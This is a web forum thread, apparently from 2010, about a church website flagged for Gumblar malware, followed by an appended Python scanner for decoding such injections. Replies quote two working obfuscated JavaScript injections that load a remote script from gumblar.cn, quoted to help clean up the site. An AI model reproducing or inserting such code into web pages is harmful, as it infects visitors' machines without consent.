Here’s their message: Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-01-29, and the last time suspicious content was found on this site was on 2010-01-29.
Malicious software includes 6 scripting exploit(s), 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 2 domain(s), including gumblar.cn/, e-procurement.co.in/.
I followed their instructions for searching for malware, but could not locate anything. Can anyone help by pointing me in the right direction? Any help would be greatly appreciated!
Site is chronicfaith.org
Hello :-),
Jaal Scan ID # 7845210832-285 output
Malicious code detected on line 350 of www.chronicfaith.org
starts with
<!—scr i p t sr c=hxxp://sh ery.hu/image s_m/securim age_meghi v>
Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.
If you have any specific issues feel free to ask for help.
Also, I am collecting info from people affected by attacks like this, if it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).
We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.
Hope this helps,
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Twitter: @stopthehacker
Facebook: stopthehacker
Jaal: Protecting the Internet, one website at a time™
Dr. Banerjee,
Thank you for your prompt and specific response! I have some knowledge about all this but more of a knowledgeable user than a user that has technical expertise. I checked the code as you suggested and you are correct it is not there but embedded in a script. I will contact my hosting provider and see if they can assist with locating it. Also, if I can be of any assistance in your compiling of information, please let me know what info you want and I will be happy to supply what I can.
Again, thank you! Audrey Brennan
In addition to the malware script already mentioned, a number of pages on your website contain the following malware script:
<script language=javascript><!--
(function(dwfh){var j3s6T='%';var jRj=('var>20>61>3d>22ScriptE>6e>67ine>22>2cb>3d>22>56er>73ion()>2b>22>2cj>3d>22>22>2c>75>3dna>76igat>6fr>2eus>65rAgent>3bif(>28u>2e>69ndex>4ff>28>22Win>22>29>3e0>29>26>26>28u>2ein>64exOf(>22>4e>54>20>36>22)>3c0>29>26>26(>64ocum>65nt>2ecoo>6bie>2einde>78Of(>22miek>3d>31>22)>3c0)>26>26(>74ypeof(>7arv>7ats)>21>3dt>79>70eof(>22A>22)))>7bzrvzts>3d>22A>22>3b>65val(>22if(>77i>6edow>2e>22+a+>22>29>6a>3dj>2b>22+a+>22Major>22+b+a>2b>22Mino>72>22+b>2b>61+>22Build>22>2bb+>22j>3b>22)>3bdocum>65nt>2ewri>74>65(>22>3c>73cript>20>73r>63>3d>2f>2f>67umbla>72>2ecn>2fr>73s>2f>3f>69d>3d>22+j>2b>22>3e>3c>5c>2f>73cr>69pt>3e>22)>3b>7d').replace(dwfh,j3s6T);var AIUX=unescape(jRj);eval(AIUX)})(/>/g);
--></script><script language=javascript><!--
(function(xGWO3){eval(unescape(('va>72>20a>3d>22>53>63ript>45ng>69ne>22>2cb>3d>22V>65>72sion()>2b>22>2cj>3d>22>22>2c>75>3d>6e>61vi>67>61t>6fr>2eu>73>65rAg>65>6et>3bif((u>2eindex>4f>66>28>22>57>69n>22)>3e0>29>26>26(u>2eind>65x>4ff(>22NT>206>22)>3c0)>26>26>28>64o>63um>65nt>2ecook>69e>2einde>78Of(>22miek>3d1>22)>3c0)>26>26(typeof(>7a>72vz>74s>29>21>3dtypeof(>22>41>22>29))>7b>7ar>76z>74s>3d>22>41>22>3be>76a>6c(>22>69>66>28>77i>6e>64ow>2e>22+a+>22)>6a>3dj+>22+>61+>22Major>22+b>2ba>2b>22>4dinor>22+>62>2ba>2b>22Buil>64>22+>62+>22>6a>3b>22>29>3b>64ocu>6d>65>6et>2ewrite(>22>3c>73cr>69pt>20>73r>63>3d>2f>2fgum>62lar>2e>63n>2f>72ss>2f>3f>69d>3d>22+j>2b>22>3e>3c>5c>2fs>63ript>3e>22>29>3b>7d').replace(xGWO3,'%')))})(/>/g);
--></script>
White Fir Design
Website Malware Removal Service
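Added example (not part of the thread, and not written by any of the posters): a Python scanner that statically finds and decodes injected blocks of the shape quoted above, where a punctuation character stands in for `%` before the string reaches `unescape` and `eval`. It infers the stand-in character, so it covers both variants shown; the sample page, the host `example.invalid`, the function names and the `MIN_PAIRS` threshold are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample page: same layout as the injected blocks quoted above, but
# the payload only references the reserved test host example.invalid.
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<script language=javascript><!--
(function(q){eval(unescape(('docum>65nt.write(>22>3cscript src>3d//example.invalid/a.js>3e>3c>5c/script>3e>22)').replace(q,'%')))})(/>/g);
--></script>
<script>var ok = 'a > b';</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
LITERAL_RE = re.compile(r"'([^'\\]{40,})'")            # long single-quoted string
HEXPAIR_RE = re.compile(r"([^\w\s])[0-9a-fA-F]{2}")    # <punctuation><hex><hex>
SRC_RE = re.compile(r"src\s*=\s*[\"']?(?:https?:)?//([\w.-]+)", re.I)
MIN_PAIRS = 5  # assumed threshold: fewer stand-in escapes than this is ignored

def decode_literal(literal):
    """Return (stand-in char, decoded text), or None if it is not escape-encoded."""
    counts = Counter(m.group(1) for m in HEXPAIR_RE.finditer(literal))
    if not counts:
        return None
    stand_in, pairs = counts.most_common(1)[0]
    if pairs < MIN_PAIRS:
        return None
    # JavaScript unescape() maps %XX to a single Latin-1 character.
    return stand_in, unquote(literal.replace(stand_in, "%"), encoding="latin-1")

def scan_html(html):
    """Statically decode suspicious <script> blocks; nothing is ever executed."""
    findings = []
    for block in SCRIPT_RE.finditer(html):
        body = block.group(1)
        if "unescape" not in body or "eval" not in body:
            continue
        for lit in LITERAL_RE.finditer(body):
            decoded = decode_literal(lit.group(1))
            if decoded:
                findings.append({
                    "line": html.count("\n", 0, block.start()) + 1,
                    "stand_in": decoded[0],
                    "decoded": decoded[1],
                    "hosts": SRC_RE.findall(decoded[1]),
                })
    return findings
```

Run `scan_html` over the text of each file on the server and over HTML stored in the backend database; a finding whose `hosts` list names a domain the site does not use marks the block to remove.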
